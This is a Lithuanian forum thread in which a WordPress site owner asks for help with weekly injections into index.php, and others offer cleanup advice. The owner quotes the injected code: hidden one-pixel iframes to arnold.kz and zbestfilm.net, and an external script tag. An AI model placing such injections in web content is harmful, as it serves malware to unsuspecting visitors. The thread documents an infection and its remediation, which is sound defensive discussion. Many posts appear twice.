Wordpress index.php..

Sveiki, dažnai kažkoks grybas isirašo į index.php failą aš nesuprantu negi naujausiuose wordpress versijose tokia saugumo spraga, kad pasinaudoje exploitu gali į index.php failą ikišti ką tik nori

Va kekviena savaite ką pamatau visuose savo saituose:

<?php

/**

* Front to the WordPress application. This file doesn't do anything, but loads

* wp-blog-header.php which does and tells WordPress to load the theme.

*

* @package WordPress

*/

/**

* Tells WordPress to load the WordPress theme and output it.

*

* @var bool

*/

define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */

require('./wp-blog-header.php');

?<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

dabar žiūrėsiu kas gausis per chmod padariau, kad write negalėtų daryti gal kas susidūre su šituo esate?

Sveiki, dažnai kažkoks grybas isirašo į index.php failą aš nesuprantu negi naujausiuose wordpress versijose tokia saugumo spraga, kad pasinaudoje exploitu gali į index.php failą ikišti ką tik nori

 

Va kekviena savaite ką pamatau visuose savo saituose:

 

 

<?php

/**

* Front to the WordPress application. This file doesn't do anything, but loads

* wp-blog-header.php which does and tells WordPress to load the theme.

*

* @package WordPress

*/

 

/**

* Tells WordPress to load the WordPress theme and output it.

*

* @var bool

*/

define('WP_USE_THEMES', true);

 

/** Loads the WordPress Environment and Template */

require('./wp-blog-header.php');

?<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

 

 

 

<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

 

 

dabar žiūrėsiu kas gausis per chmod padariau, kad write negalėtų daryti gal kas susidūre su šituo esate?

Kartais tuo virusu iš kinijos neužsikrėtei, kur dėlioja ifreimus?

Įmanoma daug brudo per rankas praleidžiu, bet pas mane linuxai tai, kad labai abejoju o kas čia per virusas iš kinijos? ;)

Įmanoma daug brudo per rankas praleidžiu, bet pas mane linuxai tai, kad labai abejoju o kas čia per virusas iš kinijos? ;)

Nu taigi kur siautė čia prieš pora mėn ar daugiau... net per tv3 žinias apie ji pasakojo... :D tik nebepamenu kaip jis vadinasi...

Nu taigi kur siautė čia prieš pora mėn ar daugiau... net per tv3 žinias apie ji pasakojo... ;) tik nebepamenu kaip jis vadinasi...

Visko gali būti nu užsidėjau per chmod, kad write negalėtų bus matyt :D

Visko gali būti nu užsidėjau per chmod, kad write negalėtų bus matyt ;)

Žiūrėk per apache veiksmų sąrašą kaip ir kada keičia tą indexą ir bus aišku :D

Reiktu perziureti pluginus ir themes. Gal kokia piktybiska yra.

Reiktu perziureti pluginus ir themes. Gal kokia piktybiska yra.

bet va tie saitai kurie pas mane paraše yra čia visiem šiem ilenda tas kodas į index.php

Pas mane irgi skriptas yra kur foother'io neįmanoma nuimti užrašo niekaip tik spalvą gaunasi pasikeisti. Šiaip gali buti, kad pas tave tas kodas įlenda per kitas saugumo spragas.

Pas mane irgi skriptas yra kur foother'io neįmanoma nuimti užrašo niekaip tik spalvą gaunasi pasikeisti. Šiaip gali buti, kad pas tave tas kodas įlenda per kitas saugumo spragas.

Base64 koduote kai turėsiu laiko butinai nuimsiu viskas įmanoma.. o ten tai bus matyt dabar gal palikim šita temą ramybeje jei vėl pasikartos žiūrėsim per chmod padariau, kad kad index.php failo negalima būtų rašyti (write)

Nu va ir vėl index faile išvydau gražu trojana iframe

<script type="text/javascript" src="http://sogpaoiy.the-mlmpowercall.com/Recursion.js"></script>

<!--b30c406bd39adc982146247bf053486a-->

o ir administracijoj reik kažką daryt mellow.gif

Nebus jokiu pasiūlimu mes pagalvojom, kad jau net išeities nebeturim tenka parduot viska visa pavasari taip žaidžiu.

pirmiausia savo kompa nuo siuksliu isisvalyk, tada pasikeisk visus slaptazodzius.

pirmiausia savo kompa nuo siuksliu isisvalyk, tada pasikeisk visus slaptazodzius.

Slaptažodis pagrindinis ir yra labai gerai sudėtas su jokiais bruteforcais ar md5 nenuimsi, reguleriai keičiamas kas puse metu

O dėl kompo nu sakau čia linuxai. Matau jau aiškiai čia sprendimo nebus.. Galvoju pasilikti sql duombazes ir iš naujo sudelioti TVS

o tu pasikeisk slaptazodi pirma, dar serve praskanuok visus failus :rolleyes:

o tu pasikeisk slaptazodi pirma, dar serve praskanuok visus failus :rolleyes:

bandysiu o dar yra toks dalykas, kad pvz php failų antivirusine neskanuoja ir nieko neranda nors ten koks iframe ikištas o yra būdas skanuoti viso saito failus na tiesiog visa ftp nes be PHP / APACHE jie kai neveikia taip ir neranda nieko.

Va pvz aš iškeliu index.php failą jame yra iframe trojan kodas antivirusine nieko neranda o kai per www ieinu jis konektinasi prie to iframe ir iškarto web shield išmeta warning..

Viska pasikeičiau, net tvs persiinstaliavau man atrodo naudodamas shella ikiša.

va vis tokie atsiranda index failuose

<html><body><iframe src="http://zbestfilm.net/media/kal/index.php?out=1276449386" width="1" height="1" frameborder="0"></iframe></body></html>>

Skaičiau galima chmod'a nužeminti iki 444 tai padariau..

tu pirma visas savo directorijas perziurek ar ner kokiu failu nenormaliu.

arba geriausia backupa imesk.

tu pirma visas savo directorijas perziurek ar ner kokiu failu nenormaliu.

arba geriausia backupa imesk.

Čia rimčiau jau viskas pakeista švaru tiesiog man atrodo čia tokie bus

http://www.phpfusion-lt.com/informacija-ba...-virusas,i18963

Grynai toks pat

http://www.delfi.lt/news/economy/ITbussine...php?id=23184420